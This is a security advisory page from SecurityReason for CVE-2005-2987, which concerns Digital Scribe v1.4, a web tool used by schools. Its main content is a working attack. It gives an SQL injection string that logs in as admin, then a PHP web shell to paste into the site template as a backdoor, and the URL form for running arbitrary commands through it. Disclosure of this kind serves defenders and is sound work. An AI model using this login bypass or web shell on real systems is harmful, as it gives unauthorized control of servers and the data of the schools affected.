|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 10 CVE : CVE-2005-2987 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : retrogod aliceposta it Published : 17.09.2005
Advisory Content : Digital Scribe v1.4 Login Bypass / SQL injection / remote code execution software: site: http://www.digital-scribe.org/ description: "Teachers have full control through a web-based interface. Designed for easy installation and even easier use, the Digital Scribe has been used in thousands of schools. No teacher or IT Personnel needs to know any computer languages in order to install and use this intuitive system. 1) Login Bypass / SQL Injection ************************************************ login as admin typing: login: " or isnull(1/0) /* password: [whatever] 2) remote code execution ******************************************************* now you can edit template and leave a backdoor on target system: at the end of the footer try this: <?php error_reporting(0); system($HTTP_GET_VARS[cmd]); ?> then you can launch commands: http://[target]/[path_to_dscribe]/index.php?cmd=[some_command] rgod site: http://rgod.altervista.org email: retrogod at aliceposta it original advisory: http://rgod.altervista.org/dscribe14.html ************************************************************************ ********  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |